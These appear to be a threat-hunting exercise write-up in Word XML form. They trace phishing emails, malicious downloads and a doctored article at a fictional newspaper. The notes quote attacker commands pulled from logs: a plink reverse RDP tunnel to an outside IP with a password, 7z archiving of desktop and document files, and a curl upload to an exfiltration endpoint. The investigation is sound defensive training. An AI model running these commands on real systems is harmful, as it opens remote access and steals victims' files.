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BA38" w14:textId="77777777" w:rsidR="00495287" w:rsidRDefault="00495287" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">Editorial Director Name: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258FCF6F" w14:textId="77777777" w:rsidR="00495287" w:rsidRPr="00AC2A15" w:rsidRDefault="00495287" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nene Leaks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1915AE0B" w14:textId="77777777" w:rsidR="00495287" w:rsidRDefault="00495287" w:rsidP="00495287">
      <w:r>
        <w:t>10.10.0.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC291DE" w14:textId="77777777" w:rsidR="00495287" w:rsidRDefault="00495287" w:rsidP="00495287">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nene_leaks@valdoriantimes.news</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1662E27E" w14:textId="77777777" w:rsidR="00495287" w:rsidRDefault="00495287" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">username: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>neleaks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A97C487" w14:textId="77777777" w:rsidR="00495287" w:rsidRDefault="00495287" w:rsidP="00495287">
      <w:r>
        <w:t>hostname: PPKQ-LAPTOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0074B6" w14:textId="7F9D6B81" w:rsidR="00973C80" w:rsidRDefault="00973C80" w:rsidP="00495287"/>
    <w:p w14:paraId="6D3E25E9" w14:textId="37475B31" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:r>
        <w:t>Start with Newspaper Printer as suggested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA5FD5C" w14:textId="542AE9D9" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:r>
        <w:t>Clark Kent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFAB71F" w14:textId="431CF54A" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00773904">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>clark_kent@valdoriantimes.news</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00DA96BE" w14:textId="599CC6F7" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001D00C3">
        <w:t>clkent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A86ACDB" w14:textId="7042C964" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:r w:rsidRPr="001D00C3">
        <w:t>6VDG-DESKTOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06630654" w14:textId="77777777" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287"/>
    <w:p w14:paraId="521AA5D8" w14:textId="40CD93AA" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">The final article was sent by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Intern</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B539DB" w14:textId="77777777" w:rsidR="001D00C3" w:rsidRPr="00AC2A15" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ronnie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>McLovin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5291BE7E" w14:textId="26027FDB" w:rsidR="001D00C3" w:rsidRPr="00AC2A15" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00AC2A15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          </w:rPr>
          <w:t>ronnie_mclovin@valdoriantimes.news</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0924ABFD" w14:textId="5BE99E02" w:rsidR="001D00C3" w:rsidRPr="00AC2A15" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
        <w:t>romclovin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A83529E" w14:textId="0A9EB870" w:rsidR="001D00C3" w:rsidRPr="00AC2A15" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
        <w:t>A37A-DESKTOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DB3318" w14:textId="6F1BA176" w:rsidR="001D00C3" w:rsidRPr="00AC2A15" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
        <w:t>10.10.0.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A565A9F" w14:textId="27A074F3" w:rsidR="00AC2A15" w:rsidRDefault="00AC2A15" w:rsidP="00495287"/>
    <w:p w14:paraId="7BE1364B" w14:textId="6E63D37C" w:rsidR="001D00C3" w:rsidRPr="00AC2A15" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:r w:rsidRPr="00AC2A15">
        <w:t>But he claimed that he never sent the email at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAF3C8F" w14:textId="608BD932" w:rsidR="001D00C3" w:rsidRPr="00AC2A15" w:rsidRDefault="001D00C3" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Look into email logs from Clark Kent, try to find the email with the article.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF6F2E3" w14:textId="755D97BD" w:rsidR="004569FD" w:rsidRDefault="001D00C3" w:rsidP="004569FD">
      <w:r>
        <w:t>Clark Kent received the email</w:t>
      </w:r>
      <w:r w:rsidR="004569FD">
        <w:t xml:space="preserve"> from Ronnie. File name: </w:t>
      </w:r>
      <w:r w:rsidR="004569FD" w:rsidRPr="004569FD">
        <w:t>OpEdFinal_to_print.docx</w:t>
      </w:r>
      <w:r w:rsidR="004569FD">
        <w:t xml:space="preserve"> Time: </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk180153331"/>
      <w:r w:rsidR="004569FD" w:rsidRPr="004569FD">
        <w:t>2024-01-31T11:11:12Z</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00AC2A15" w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22933715" wp14:editId="14E58AD6">
            <wp:extent cx="5943600" cy="250190"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27512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6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02E0" w14:textId="2FF2E872" w:rsidR="00DC0DD5" w:rsidRDefault="00DC0DD5" w:rsidP="004569FD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ronnie received suspicious emails as well from </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00EA13DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>valdorias_best_recruiter@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0DD5">
        <w:t>2024-01-10T08:48:16Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The link in the email is </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00EA13DB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://promotionrecruit.org/share/Editorial_J0b_Openings_2024.docx</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212B0764" w14:textId="035AE4A7" w:rsidR="00DC0DD5" w:rsidRDefault="00DC0DD5" w:rsidP="004569FD">
      <w:r>
        <w:t xml:space="preserve">It is clicked at </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0DD5">
        <w:t>2024-01-10T08:55:07Z</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A47B0C8" w14:textId="288A1493" w:rsidR="00DC0DD5" w:rsidRPr="0074077C" w:rsidRDefault="00DC0DD5" w:rsidP="004569FD">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Now check </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> creation event to see if anything s is downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D7C0ED" w14:textId="2EA0D678" w:rsidR="00DC0DD5" w:rsidRDefault="00DC0DD5" w:rsidP="004569FD">
      <w:r>
        <w:t xml:space="preserve">The file </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC0DD5">
        <w:t>Editorial_J0b_Openings_2024.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was downloaded on Ronnie’s host with Ronnie’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>user name</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="_Hlk180155479"/>
      <w:r w:rsidRPr="00DC0DD5">
        <w:t>2024-01-10T08:55:17Z</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBE01E" w14:textId="4A3ED9B1" w:rsidR="00DC0DD5" w:rsidRDefault="00DC0DD5" w:rsidP="004569FD">
      <w:r w:rsidRPr="0074077C">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Now let’s check process event logs to see other activities after the download on Ronnie’s host</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F08DE16" w14:textId="77777777" w:rsidR="00954C3F" w:rsidRDefault="00DC0DD5" w:rsidP="00954C3F">
      <w:r>
        <w:t xml:space="preserve">We see the same </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file was downloaded at </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_Hlk180155549"/>
      <w:r w:rsidRPr="00DC0DD5">
        <w:t>2024-01-10T08:55:51Z</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t xml:space="preserve">. And there are identical </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>events</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> occurred afterward.</w:t>
      </w:r>
      <w:r w:rsidR="00954C3F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BF928" w14:textId="57DC71DC" w:rsidR="00954C3F" w:rsidRDefault="00954C3F" w:rsidP="00954C3F">
      <w:r w:rsidRPr="00954C3F">
        <w:t xml:space="preserve">plink.exe -R 3389:localhost:3389 -ssh -l $had0w -pw </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00954C3F">
        <w:t>thruthW!llS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00954C3F">
        <w:t>3tUfree 168.57.191.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA49987" w14:textId="28F1C545" w:rsidR="0074077C" w:rsidRDefault="0074077C" w:rsidP="00954C3F">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Now’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> let’s </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>look into</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> any other suspicious activity afterward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAA801C" w14:textId="77777777" w:rsidR="0074077C" w:rsidRDefault="0074077C" w:rsidP="0074077C">
      <w:r>
        <w:t xml:space="preserve">We see this command: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A689D">
        <w:t>move C:\Users\romclovin\Downloads\fakestory.docx C:\Users\romclovin\Documents\OpEdFinal_to_print.docx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="_Hlk180155811"/>
      <w:r w:rsidRPr="007A689D">
        <w:t>2024-01-31T10:26:20Z</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF3C252" w14:textId="77777777" w:rsidR="0074077C" w:rsidRDefault="0074077C" w:rsidP="0074077C">
      <w:r>
        <w:t>And: curl -F "file=@C:\Users\romclovin\Documents\*.7z" https://hirejob.com/exfil_processor/upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34729CBB" w14:textId="77777777" w:rsidR="0074077C" w:rsidRDefault="0074077C" w:rsidP="0074077C">
      <w:r>
        <w:t xml:space="preserve">"C:\Users\romclovin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=renderer --autoplay-policy=no-user-gesture-required </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF37CB7" w14:textId="77777777" w:rsidR="0074077C" w:rsidRDefault="0074077C" w:rsidP="0074077C">
      <w:r>
        <w:t xml:space="preserve">7z.exe a -t7z C:\Users\romclovin\Documents\DankMemes.7z C:\Users\romclovin\Memes\*.jpg -p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>thruthW!llS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3tUfree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37043699" w14:textId="77777777" w:rsidR="0074077C" w:rsidRDefault="0074077C" w:rsidP="0074077C">
      <w:r>
        <w:t xml:space="preserve">7z.exe a -t7z C:\Users\romclovin\Documents\MyStolenDataFromDesktop.7z C:\Users\romclovin\Desktop\*.docx -p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>thruthW!llS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3tUfree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B43AF58" w14:textId="0FEE1223" w:rsidR="0074077C" w:rsidRPr="00954C3F" w:rsidRDefault="0074077C" w:rsidP="00954C3F">
      <w:r>
        <w:t xml:space="preserve">7z.exe a -t7z C:\Users\romclovin\Documents\MyStolenDataFromDocuments.7z C:\Users\romclovin\Documents\*.docx -p </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>thruthW!llS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3tUfree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3185600D" w14:textId="4B32388A" w:rsidR="00DC0DD5" w:rsidRPr="004569FD" w:rsidRDefault="00DC0DD5" w:rsidP="004569FD"/>
    <w:p w14:paraId="6CFE9474" w14:textId="18D0B9D8" w:rsidR="001D00C3" w:rsidRDefault="001D00C3" w:rsidP="00495287"/>
    <w:p w14:paraId="327F9DFE" w14:textId="4340B9A4" w:rsidR="004569FD" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">Received more info from </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sonia </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, the senior editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB6B31F" w14:textId="0F526565" w:rsidR="004569FD" w:rsidRPr="00AC2A15" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00AC2A15">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0F9ED5" w:themeColor="accent4"/>
          </w:rPr>
          <w:t>sonia_gose@valdoriantimes.news</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="621B611C" w14:textId="47A23FA2" w:rsidR="004569FD" w:rsidRPr="00AC2A15" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sogose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0369E20B" w14:textId="20B7AA1B" w:rsidR="004569FD" w:rsidRPr="00AC2A15" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
        <w:t>UL0M-MACHINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A83595" w14:textId="41520D96" w:rsidR="004569FD" w:rsidRPr="00AC2A15" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:color w:val="0F9ED5" w:themeColor="accent4"/>
        </w:rPr>
        <w:t>10.10.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0A45F4" w14:textId="1DAEA1FC" w:rsidR="004569FD" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">She received a suspicious email from </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00773904">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>newspaper_jobs@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidRPr="004569FD">
        <w:t>2024-01-05T09:42:05Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5614642F" w14:textId="35568ACB" w:rsidR="004569FD" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:r w:rsidRPr="004569FD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54174E2F" wp14:editId="67D81F82">
            <wp:extent cx="4229100" cy="3180861"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="219555372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5372" name="Picture 1" descr="A screenshot of a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461" cy="32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86F" w14:textId="77777777" w:rsidR="004569FD" w:rsidRPr="004569FD" w:rsidRDefault="004569FD" w:rsidP="004569FD">
      <w:r>
        <w:t xml:space="preserve">The link included in the email is </w:t>
      </w:r>
      <w:r w:rsidRPr="004569FD">
        <w:t>https://promotionrecruit.com/published/Valdorian_Times_Editorial_Offer_Letter.docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BA72B5" w14:textId="0B816433" w:rsidR="004569FD" w:rsidRPr="00AC2A15" w:rsidRDefault="004569FD" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Look into </w:t>
      </w:r>
      <w:r w:rsidR="003336DD" w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">the network log to see </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>if the link is clicked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C0FEF5" w14:textId="774ECE73" w:rsidR="003336DD" w:rsidRDefault="003336DD" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">She clicked the link at </w:t>
      </w:r>
      <w:r w:rsidRPr="003336DD">
        <w:t>2024-01-05T10:23:17Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1A858" w14:textId="74FE45E7" w:rsidR="003336DD" w:rsidRPr="00AC2A15" w:rsidRDefault="003336DD" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Look into </w:t>
      </w:r>
      <w:r w:rsidR="001110EC" w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>file download</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if the file is downloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D4799D" w14:textId="1F7F628B" w:rsidR="003336DD" w:rsidRDefault="003336DD" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">The file is downloaded on Sonia’s host at </w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Hlk180153466"/>
      <w:r w:rsidRPr="003336DD">
        <w:t>2024-01-05T10:24:04Z</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t xml:space="preserve">. The file path is </w:t>
      </w:r>
      <w:r w:rsidRPr="003336DD">
        <w:t>C:\Users\sogose\Downloads\</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Hlk180153493"/>
      <w:r w:rsidRPr="003336DD">
        <w:t>Valdorian_Times_Editorial_Offer_Letter.docx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="56746BDC" w14:textId="08DA5B4F" w:rsidR="003336DD" w:rsidRDefault="003336DD" w:rsidP="00495287">
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Look into the file hash to see if it’s malicious.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Should be malicious but since it’s exercise, no record is found of the hash on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454D79C" w14:textId="363BE816" w:rsidR="003336DD" w:rsidRDefault="003336DD" w:rsidP="00495287">
      <w:r w:rsidRPr="003336DD">
        <w:t>60b854332e393a6a2f0015383969c3ac705126a6b7829b762057a3994967a61f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0843C2AA" w14:textId="72F56AC3" w:rsidR="003336DD" w:rsidRPr="00AC2A15" w:rsidRDefault="003336DD" w:rsidP="00495287">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Let’s stay on the same host and see any malicious activity right after the download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A27A32" w14:textId="279E9FB5" w:rsidR="001110EC" w:rsidRDefault="001110EC" w:rsidP="00495287">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script was downloaded at </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Hlk180153543"/>
      <w:r w:rsidRPr="001110EC">
        <w:t>2024-01-05T10:24:32Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="001110EC">
        <w:t>C:\ProgramData\hacktivist_manifesto.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="001110EC">
        <w:tab/>
        <w:t>hacktivist_manifesto.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="001110EC">
        <w:tab/>
        <w:t>explorer.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5392FD" w14:textId="56CF7BC2" w:rsidR="001110EC" w:rsidRDefault="001110EC" w:rsidP="00495287">
      <w:r>
        <w:t xml:space="preserve">Hash value is: </w:t>
      </w:r>
      <w:r w:rsidRPr="001110EC">
        <w:t>1c3ef0407d5714037504c52f7abfa86c081fd7a021b52e2abe8a669f92413252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51599E55" w14:textId="17A7E910" w:rsidR="001110EC" w:rsidRDefault="001110EC" w:rsidP="00495287">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC2A15">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> show is file as malicious virus</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
